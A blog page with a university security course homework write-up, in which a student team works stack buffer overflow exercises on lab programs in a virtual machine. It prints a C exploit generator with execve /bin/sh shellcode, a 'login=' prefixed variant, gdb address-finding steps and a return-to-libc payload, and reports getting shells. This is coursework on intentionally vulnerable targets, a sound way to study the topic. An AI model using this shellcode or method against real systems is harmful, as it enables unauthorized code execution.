<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sws," />










<meta name="description" content="Submission02 of SWSXusong Wang 3375907Huicheng Qian 3443114Shkodran Abdullahu 3466256 We mimic the way from the example of lectures, insert a printf() as an assistant. 12345void callme(char *a) &amp;#123;">
<meta property="og:type" content="article">
<meta property="og:title" content="Submission02 of SWS">
<meta property="og:url" content="http://yoursite.com/2020/05/15/SWS/Submission02/index.html">
<meta property="og:site_name" content="Seven&#39;s blog">
<meta property="og:description" content="Submission02 of SWSXusong Wang 3375907Huicheng Qian 3443114Shkodran Abdullahu 3466256 We mimic the way from the example of lectures, insert a printf() as an assistant. 12345void callme(char *a) &amp;#123;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066163/Screenshot_from_2020-05-10_01-14-58_jwd7vo.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_04_18_hmw0i4.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_05_05_ixx08h.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_05_25_aaixtc.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-39_xxpea8.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066163/Screenshot_from_2020-05-10_01-14-49_nm8nlo.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589152125/VirtualBox_System_Security_VM_1_11_05_2020_01_08_11_f3otdb.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589152471/Screenshot_from_2020-05-11_01-14-11_osmqdu.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589146113/webwxgetmsgimg_picr9k.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-16_pqlfuj.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-27_iwhh8d.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589156595/VirtualBox_System_Security_VM_1_11_05_2020_02_13_31_p93oho.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-07_uhiodq.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200490/Screenshot_from_2020-05-11_14-25-29_ny8gib.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200490/Screenshot_from_2020-05-11_14-26-59_gcndkd.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200888/P4_vyezob.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-13-31_wpuhor.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-13-58_xnve6i.png">
<meta property="article:published_time" content="2020-05-15T08:44:09.000Z">
<meta property="article:modified_time" content="2020-05-15T15:11:48.195Z">
<meta property="article:author" content="Seven ♂">
<meta property="article:tag" content="sws">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066163/Screenshot_from_2020-05-10_01-14-58_jwd7vo.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"right","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"bounceIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/15/SWS/Submission02/"/>





  <title>Submission02 of SWS | Seven's blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Seven's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/15/SWS/Submission02/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Seven ♂">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.JPG">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Seven's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Submission02 of SWS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-15T10:44:09+02:00">
                2020-05-15
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/theory/" itemprop="url" rel="index">
                    <span itemprop="name">theory</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Submission02-of-SWS"><a href="#Submission02-of-SWS" class="headerlink" title="Submission02 of SWS"></a>Submission02 of SWS</h2><h2 id="Xusong-Wang-3375907"><a href="#Xusong-Wang-3375907" class="headerlink" title="Xusong Wang 3375907"></a>Xusong Wang 3375907</h2><h2 id="Huicheng-Qian-3443114"><a href="#Huicheng-Qian-3443114" class="headerlink" title="Huicheng Qian 3443114"></a>Huicheng Qian 3443114</h2><h2 id="Shkodran-Abdullahu-3466256"><a href="#Shkodran-Abdullahu-3466256" class="headerlink" title="Shkodran Abdullahu 3466256"></a>Shkodran Abdullahu 3466256</h2><p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066163/Screenshot_from_2020-05-10_01-14-58_jwd7vo.png" alt=""></p>
<p>We mimic the way from the example of lectures, insert a printf() as an assistant.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">callme</span><span class="params">(<span class="keyword">char</span> *a)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">char</span> b[<span class="number">255</span>];</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Address of buffer in exploitable program: %08x\n"</span>, b); <span class="comment">//edited </span></span><br><span class="line">  <span class="built_in">strcpy</span>(b, a);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>After we compile the target file and execute, we get the 0xbffff759 , and we need to overflow the stack in order to overwrite the  return address , which aligned the 4-bytes to the address  0xbffff759. So we modifed  part of code from the example.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fill whole buffer with the target address, i=3 for align</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">3</span>; i &lt; bsize; i+=<span class="number">4</span>)</span><br><span class="line">  <span class="built_in">memcpy</span>(buff+i, &amp;addr, <span class="number">4</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_04_18_hmw0i4.png" alt=""></p>
<p>Change the updated address 0xbffff369</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_05_05_ixx08h.png" alt=""></p>
<p>At last we got the shell.</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589144743/VirtualBox_System_Security_VM_1_10_05_2020_23_05_25_aaixtc.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-39_xxpea8.png" alt=""></p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066163/Screenshot_from_2020-05-10_01-14-49_nm8nlo.png" alt="-w70" style="zoom:67%;" />



<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589152125/VirtualBox_System_Security_VM_1_11_05_2020_01_08_11_f3otdb.png" alt=""></p>
<p>By gdb, we got the address of b[0] which we could update our input data. We reused the example to generate a string, which concludes the shellcode  and repeated b[0] address.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">char</span> shellcode[] = <span class="string">""</span></span><br><span class="line">  <span class="string">"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</span></span><br><span class="line">  <span class="string">"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"</span></span><br><span class="line">  <span class="string">"\x80\xe8\xdc\xff\xff\xff/bin/sh"</span>;</span><br><span class="line"><span class="comment">// usage: exploit target-prog buffer-size target-addr</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>**argv)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i;</span><br><span class="line">  <span class="keyword">char</span> *buff, *ptr;</span><br><span class="line">  <span class="keyword">int</span> bsize = <span class="number">272</span>;</span><br><span class="line">  <span class="keyword">long</span> <span class="keyword">int</span> addr = <span class="number">0xbffff724</span>; <span class="comment">//the address of the b[0]</span></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Generating buffer with size %d and target address %08x\n"</span>, bsize, addr)</span><br><span class="line">  <span class="comment">// allocate buffer for exploit string</span></span><br><span class="line">  buff = <span class="built_in">malloc</span>(bsize);</span><br><span class="line">  <span class="comment">// fill whole buffer with the target address</span></span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; bsize; i+=<span class="number">4</span>)</span><br><span class="line">    <span class="built_in">memcpy</span>(buff+i, &amp;addr, <span class="number">4</span>);</span><br><span class="line">  <span class="comment">// put shellcode to the beginning of exploit string</span></span><br><span class="line">  <span class="built_in">memcpy</span>(buff, shellcode, <span class="built_in">strlen</span>(shellcode));</span><br><span class="line">  <span class="comment">// terminate string</span></span><br><span class="line">  buff[bsize - <span class="number">1</span>] = <span class="string">'\0'</span>;</span><br><span class="line">  <span class="comment">// print buffer</span></span><br><span class="line">	FILE* f;</span><br><span class="line">    f = fopen(<span class="string">"input"</span>, <span class="string">"w"</span>);</span><br><span class="line">    <span class="built_in">fputs</span>(buff, f);</span><br><span class="line">	fclose(f);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure>

<p>Below is what our input data file.</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589152471/Screenshot_from_2020-05-11_01-14-11_osmqdu.png" alt=""></p>
<p>Reload into the target vulnerable program. Get the shell.</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589146113/webwxgetmsgimg_picr9k.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-16_pqlfuj.png" alt=""></p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-27_iwhh8d.png" alt="zo" style="zoom:50%;" />

<p>The problem 3 is the similar to the problem1, but with limitation for a prefix ‘login=’ , we rewrote the shellcode with a prefix ‘login=’,</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">char</span> shellcode[] = <span class="string">"login="</span></span><br><span class="line">  <span class="string">"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</span></span><br><span class="line">  <span class="string">"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"</span></span><br><span class="line">  <span class="string">"\x80\xe8\xdc\xff\xff\xff/bin/sh"</span>;</span><br></pre></td></tr></table></figure>

<p>And we inserted some debugging codes into the target program in order to locate the address of str2.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">foo</span> <span class="params">(<span class="keyword">char</span> *str)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i;</span><br><span class="line">  <span class="keyword">char</span> str1[<span class="number">256</span>];</span><br><span class="line">  <span class="keyword">char</span> str2[<span class="number">512</span>];</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Address of buffer in str1 program: %08x\n"</span>, str1); <span class="comment">//edited </span></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Address of buffer in str2 program: %08x\n"</span>, str2); <span class="comment">//edited </span></span><br><span class="line">  <span class="built_in">strcpy</span>(str2,str);</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">256</span>; i++)</span><br><span class="line">    str1[i] = str2[<span class="number">2</span>*i];</span><br><span class="line">  str1[<span class="number">255</span>] = <span class="string">'\0'</span>;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"%s\n"</span>, str1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>By the help of gdb, we located the address , since the real shell code begin after the ‘login=’, we should also plus 6 when assigning the repeated return address. For example, in our case, although address of str2 is 0xbffff144, we need to attempt to write 0xbffff14a to the return address.</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589156595/VirtualBox_System_Security_VM_1_11_05_2020_02_13_31_p93oho.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-14-07_uhiodq.png" alt=""></p>
<blockquote>
<p> not solved, no find command available in gdb, failed to find the correct address of ‘bin/sh’</p>
</blockquote>
<p>Later updated: the address of the ‘bin/sh’ is found.</p>
<ol>
<li><p>finding the ‘bin/sh’ without ‘find’.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(gdb)b main</span><br><span class="line">(gdb)r</span><br><span class="line">(gdb)info proc map</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200490/Screenshot_from_2020-05-11_14-25-29_ny8gib.png" alt=""></p>
<p>The address of ‘bin/sh’ should be between 0xb7e8f000 and 0xb7fd8000. Since ‘find’ is not available, we have to spent hours to find it manually(eg. x/10000s 0xb7e8f000) , finally it was found located at address 0xb7fbb3ce </p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200490/Screenshot_from_2020-05-11_14-26-59_gcndkd.png" alt=""></p>
</li>
<li><p>finding address of system(), </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(gdb)b main</span><br><span class="line">(gdb)r</span><br><span class="line">(gdb)p system</span><br></pre></td></tr></table></figure>

<p>System address 0xb7ec7990</p>
</li>
<li><p>Construct our ‘Return to libc’ overwritting buffer.</p>
</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">char</span> Relib[] = <span class="string">"AAAAAAAA"</span></span><br><span class="line">	<span class="string">"\x90\x79\xec\xb7"</span></span><br><span class="line">		<span class="string">"AAAA"</span></span><br><span class="line">	<span class="string">"\xce\xb3\xfb\xb7"</span>;</span><br></pre></td></tr></table></figure>

<ol start="4">
<li><p>got the shell</p>
<p>The address of b is start at 0xbffff7a4, </p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589200888/P4_vyezob.png" alt=""></p>
<ul>
<li>updated after the exercise session: we just need to cover start shellcode begun with some nops, and write the return address with the previous argument address.</li>
</ul>
</li>
</ol>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-13-31_wpuhor.png" alt=""></p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589066162/Screenshot_from_2020-05-10_01-13-58_xnve6i.png" style="zoom:50%;" />

<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
<th></th>
<th>char j[0]</th>
<th>char j[1]</th>
<th align="center">char j[2]</th>
</tr>
</thead>
<tbody><tr>
<td>0xbffff850</td>
<td>0xbffff851</td>
<td>0xbffff852</td>
<td>0xbffff853</td>
<td>0xbffff854</td>
<td>0xbffff855</td>
<td>0xbffff856</td>
<td align="center">0xbffff857</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td>int a</td>
<td>int a</td>
<td>int a</td>
<td>int a</td>
<td>int b</td>
<td>int b</td>
<td>int b</td>
<td align="center">int b</td>
</tr>
<tr>
<td>0xbffff858</td>
<td>0xbffff859</td>
<td>0xbffff85a</td>
<td>0xbffff85b</td>
<td>0xbffff85c</td>
<td>0xbffff85d</td>
<td>0xbffff85e</td>
<td align="center">0xbffff85f</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>char c</td>
<td>int d</td>
<td>int d</td>
<td>int d</td>
<td align="center">int d</td>
</tr>
<tr>
<td>0xbffff860</td>
<td>0xbffff861</td>
<td>0xbffff862</td>
<td>0xbffff863</td>
<td>0xbffff864</td>
<td>0xbffff865</td>
<td>0xbffff866</td>
<td align="center">0xbffff867</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td></td>
<td>short e</td>
<td>short e</td>
<td>int f</td>
<td>int f</td>
<td>int f</td>
<td align="center">int f</td>
</tr>
<tr>
<td>0xbffff868</td>
<td>0xbffff869</td>
<td>0xbffff86a</td>
<td>0xbffff86b</td>
<td>0xbffff86c</td>
<td>0xbffff86d</td>
<td>0xbffff86e</td>
<td align="center">0xbffff86f</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td>char g</td>
<td>short h</td>
<td>short h</td>
<td>int i</td>
<td>int i</td>
<td>int i</td>
<td align="center">int i</td>
</tr>
<tr>
<td>0xbffff870</td>
<td>0xbffff871</td>
<td>0xbffff872</td>
<td>0xbffff873</td>
<td>0xbffff874</td>
<td>0xbffff875</td>
<td>0xbffff876</td>
<td align="center">0xbffff877</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td>int k</td>
<td>int k</td>
<td>int k</td>
<td>int k</td>
<td></td>
<td></td>
<td></td>
<td align="center"></td>
</tr>
<tr>
<td>0xbffff878</td>
<td>0xbffff879</td>
<td>0xbffff87a</td>
<td>0xbffff87b</td>
<td>0xbffff87c</td>
<td>0xbffff87d</td>
<td>0xbffff87e</td>
<td align="center">0xbffff87f</td>
</tr>
</tbody></table>
<p>The figure above is right after all the variables are declared, that is a breakpoint before the line 14.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sws/" rel="tag"># sws</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/15/SWS/Submission03/" rel="next" title="Submission03 of SWS">
                <i class="fa fa-chevron-left"></i> Submission03 of SWS
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/16/SWS/Submission01_en/" rel="prev" title="SWS/Submission01_en">
                SWS/Submission01_en <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript" target="_blank" rel="noopener">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.JPG"
                alt="Seven ♂" />
            
              <p class="site-author-name" itemprop="name">Seven ♂</p>
              <p class="site-description motion-element" itemprop="description">Try harder</p>
          </div>

	<div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=120 src="//music.163.com/outchain/player?type=0&id=5004636762&auto=0&height=430"></iframe>
	</div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/FastG0at" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:st164478@stud.uni-stuttgart.de" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Submission02-of-SWS"><span class="nav-number">1.</span> <span class="nav-text">Submission02 of SWS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Xusong-Wang-3375907"><span class="nav-number">2.</span> <span class="nav-text">Xusong Wang 3375907</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Huicheng-Qian-3443114"><span class="nav-number">3.</span> <span class="nav-text">Huicheng Qian 3443114</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shkodran-Abdullahu-3466256"><span class="nav-number">4.</span> <span class="nav-text">Shkodran Abdullahu 3466256</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Seven ♂</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
